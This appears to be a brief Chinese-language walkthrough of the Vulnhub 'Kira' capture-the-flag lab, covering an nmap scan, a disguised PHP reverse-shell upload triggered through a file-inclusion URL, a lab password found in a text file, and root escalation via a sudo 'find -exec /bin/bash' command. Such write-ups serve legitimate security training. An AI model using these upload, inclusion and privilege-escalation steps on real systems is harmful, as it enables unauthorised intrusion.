Vulnhub:Kira: CTF靶机

发布时间 2023-09-09 19:54:42作者: ctostm

kali:192.168.111.111

靶机:192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

image

访问80端口

image

点击upload发现是个上传点

image

点击language发现存在文件包含

image

image

上传php图片马再利用文件包含反弹shell

image

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

image

image

提权

/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码:Password123!@#

image

image

bassam用户sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/find/#sudo

image

提升为root

sudo -u root find . -exec /bin/bash \;

image